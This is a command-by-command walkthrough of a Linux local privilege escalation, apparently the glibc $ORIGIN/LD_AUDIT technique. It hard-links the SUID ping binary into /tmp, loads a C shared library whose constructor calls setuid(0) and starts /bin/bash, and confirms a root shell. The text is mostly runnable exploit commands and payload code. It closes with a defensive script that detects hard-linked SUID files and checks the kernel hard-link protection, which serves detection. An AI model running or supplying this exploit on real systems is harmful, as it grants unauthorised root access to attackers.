View the /tmp directory permissions
ll -d /tmp
Switch to the /tmp directory
cd /tmp
Create a directory named exploit
mkdir exploit
View the ping command, which has SUID permissions
ll /bin/ping
Create a hard link to it named target
ln /bin/ping /tmp/exploit/target
Check the target file's permissions
ll /tmp/exploit/target
Open the target file on file descriptor 3 so the shell keeps it held open
exec 3< /tmp/exploit/target
You can check the open descriptor
ll /proc/$$/fd/3
Delete the target file
rm -rf /tmp/exploit/
You can check that the descriptor now shows the target in the deleted state
ll /proc/$$/fd/3
Create the payload code in C
vim payload.c
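#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid() */

/* Constructor: runs as soon as the library is loaded.
   Note the two underscores on each side of "attribute". */
void __attribute__((constructor)) init(void)
{
    setuid(0);
    system("/bin/bash");
}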
Compile the code with gcc
gcc -W -fPIC -shared -o /tmp/exploit payload.c
Elevate to root privileges
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
Once it has executed, check that the current session is already root
whoami
Appendix: you can find all SUID files on the system with the following command:
find / -perm -04000 -type f -ls
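The find command above can be narrowed into a defensive check. The sketch below is an added example, not part of the original walkthrough: it lists SUID files that have more than one hard link (the state the ln step creates) and reports the kernel's fs.protected_hardlinks setting. The function names and the fixture are constructed for this example.

```shell
#!/bin/sh
# Added defensive example; function names are this example's own.

# List SUID regular files under DIR that have more than one hard link.
# A second name for a SUID binary in a user-writable directory is what
# "ln /bin/ping /tmp/exploit/target" produces.
suid_multilink() {
    find "$1" -xdev -type f -perm -4000 -links +1 2>/dev/null
}

# Report the kernel hard-link restriction:
#   1 = the kernel refuses hard links to SUID files the user does not own
#   0 = restriction off
#   unknown = sysctl file absent (older kernel, or /proc not mounted)
hardlink_protection() {
    if [ -r /proc/sys/fs/protected_hardlinks ]; then
        cat /proc/sys/fs/protected_hardlinks
    else
        echo unknown
    fi
}

# Constructed fixture: one SUID-flagged file with a second hard link and
# one SUID-flagged file with a single link. Prints the fixture directory.
make_fixture() {
    d=$(mktemp -d) || return 1
    mkdir "$d/bin" "$d/tmp"
    : > "$d/bin/linked"
    : > "$d/bin/single"
    chmod 4755 "$d/bin/linked" "$d/bin/single"
    ln "$d/bin/linked" "$d/tmp/target"
    echo "$d"
}

# Demo on the constructed fixture; on a real host run: suid_multilink /
fixture=$(make_fixture)
echo "protected_hardlinks: $(hardlink_protection)"
suid_multilink "$fixture" | sort
rm -rf "$fixture"
```

Both names of the linked file are reported, so the unexpected path stands out next to the legitimate one; the single-link SUID file is not listed.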